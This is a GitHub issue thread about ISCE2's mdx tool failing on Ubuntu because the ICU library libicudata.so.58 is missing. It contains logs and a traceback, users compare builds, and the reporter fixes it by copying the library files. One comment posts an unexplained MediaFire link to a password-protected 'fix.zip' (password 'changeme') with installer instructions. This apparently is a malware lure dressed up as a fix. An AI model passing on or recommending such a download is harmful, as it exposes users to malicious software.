### ISSUE TITLE
[visualization] mdx Problem

### ISSUE THREAD

**Issue by ditafaith** [isce-framework/isce2#873]
Hi @hfattahi,
I am running cmd_3.sh on Ubuntu 22.04 to process ALOS data following the [tutorial.](https://github.com/isce-framework/isce2/blob/main/contrib/stack/alosStack/alosStack_tutorial.txt)
However, there is an error and I assume it related to mdx.py can't run properly due to missing library libicudata.so.58.
Any response is appreciated.

_Bounding boxes dont match. Not adding bbox info.
GDAL open (R): ion/ion_cal/diff_231031-231128_32rlks_64alks.int.vrt
GDAL close: ion/ion_cal/diff_231031-231128_32rlks_64alks.int.vrt
Using default ISCE Path: /home/saka/miniconda3/envs/isce2/lib/python3.12/site-packages/isce
mdx pairs_ion/230627-230725/ion/ion_cal/diff_230627-230725_32rlks_64alks_ori.int -s 272 -c8pha -cmap cmy -wrap 6.283185307179586 -addr -3.141592653589793 -P -workdir fig_ion
mdx: error while loading shared libraries: libicudata.so.58: cannot open shared object file: No such file or directory
Traceback (most recent call last):
  File "/home/saka/work/isce2/isce2_codes/contrib/stack/alosStack/ion_check.py", line 100, in <module>
    runCmd('mdx {} -s {} -c8pha -cmap cmy -wrap 6.283185307179586 -addr -3.141592653589793{} -P -workdir {}'.format(diffOriginal, width, wbdArguments, odir))
  File "/home/saka/miniconda3/envs/isce2/lib/python3.12/site-packages/isce/components/isceobj/Alos2Proc/Alos2ProcPublic.py", line 16, in runCmd
    raise Exception('error when running:\n{}\n'.format(cmd))
Exception: error when running:
mdx pairs_ion/230627-230725/ion/ion_cal/diff_230627-230725_32rlks_64alks_ori.int -s 272 -c8pha -cmap cmy -wrap 6.283185307179586 -addr -3.141592653589793 -P -workdir fig_ion_

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ditafaith** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Hi, can you explain what is it?

**Comment by ditafaith** [comment]
I don't think it should be added to the system path since the mdx.py is part of ISCE2.
Currently, maybe I give comment on cmd_3 scripts where the mdx is executed.

**Comment by ditafaith** [comment]
Hi @Arctic-Ambrun do you have idea how to solve mdx problem ?
mdx command can't running due to missing file as mentioned in error message
`mdx: error while loading shared libraries: libicudata.so.58: cannot open shared object file: No such file or directory`

**Comment by SpiderPigzz** [comment]
Hello, seems like I'm also facing this issue. Had a clean installation using CMAKE on the newest github commit and had a similar issue with the `icu` library. The specific error I'm getting is `mdx: error while loading shared libraries: libicui18n.so.58: cannot open shared object file: No such file or directory`. This happens when I type `mdx` into the command line.

Seems like it's trying to reference a very old version of the library. I haven't found the solution yet, perhaps it might work if I install using scons.

**Comment by ditafaith** [comment]
`libicui18n.so.58` is quite old and it looks like Ubuntu no longer to maintain this package.
However, we still rely on `mdx` to grab fast visualize the results. 
@yunjunz could you give some idea on this matters?

**Comment by SpiderPigzz** [comment]
`mdx` works when I install using the conda package for version 2.6.3

**Comment by ditafaith** [comment]
It sounds confusing that previously you mention got same error, but last message mention it works. Which OS do you use?
I also use ISCE2 version 2.6.3 which is the latest one, but the error remains.

**Comment by SpiderPigzz** [comment]
Ah, the issue only arises for me if I compile with CMAKE using the newest commit on GitHub (Not v2.6.3).

However, if I don't compile and do installation using the packaged conda-forge isce2 library, it works fine. But I want to use the newest features that were added after 2.6.3.

**Comment by ditafaith** [comment]
@SpiderPigzz noted it, thanks for sharing your experience.
Anyway, I can solve it by copying 2 files both libicui18n.so.58 and libjpeg.so.9.
It can be #closed
